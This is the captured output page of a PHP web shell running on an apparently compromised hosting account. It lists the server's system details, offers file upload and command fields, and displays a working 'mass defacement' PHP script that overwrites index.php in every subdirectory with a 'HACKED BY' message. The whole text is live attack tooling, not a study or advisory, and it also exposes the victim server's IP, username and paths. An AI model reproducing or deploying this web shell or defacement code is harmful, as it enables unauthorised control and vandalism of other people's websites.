403Webshell
Server IP : 172.67.157.124  /  Your IP : 216.73.216.213
Web Server : LiteSpeed
System : Linux s12482.usc1.stableserver.net 5.14.0-570.32.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Aug 6 11:30:41 EDT 2025 x86_64
User : snownico ( 1231)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/snownico/anywhere-iptv.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/snownico/anywhere-iptv.com/csss.php
 <?php

/*

Mass Defacement Script By Yunus Incredibl

Contact => https://www.facebook.com/impaired.brain1

*/

echo "<title>Mass Defacer - Impaired brain</title>";
echo "<center><form method='POST'>";
echo "Base Dir : <input type='text' name='base_dir' size='45' value='".getcwd ()."'><br><br>";
echo "File Name : <input type='text' name='file_name' value='index.php'><br><br>";
echo "Your Index : <br><textarea style='width: 785px; height: 330px;' name='index'>HACKED BY Impaired brain ..
..
..
...







.\Logout//</textarea><br>";
echo "<input type='submit' value='Start'></form></center>";

if (isset ($_POST['base_dir']))
{
	if (!file_exists ($_POST['base_dir']))
		die ($_POST['base_dir']." Not Found !<br>");

	if (!is_dir ($_POST['base_dir']))
		die ($_POST['base_dir']." Is Not A Directory !<br>");

	@chdir ($_POST['base_dir']) or die ("Cannot Open Directory");

	$files = @scandir ($_POST['base_dir']) or die ("oohhh shet<br>");

	foreach ($files as $file):
		if ($file != "." && $file != ".." && @filetype ($file) == "dir")
		{
			$index = getcwd ()."/".$file."/".$_POST['file_name'];
			if (file_put_contents ($index, $_POST['index']))
				echo "$index&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
		}
	endforeach;
}

?>
?>

Youez - 2016 - github.com/yon3zu
LinuXploit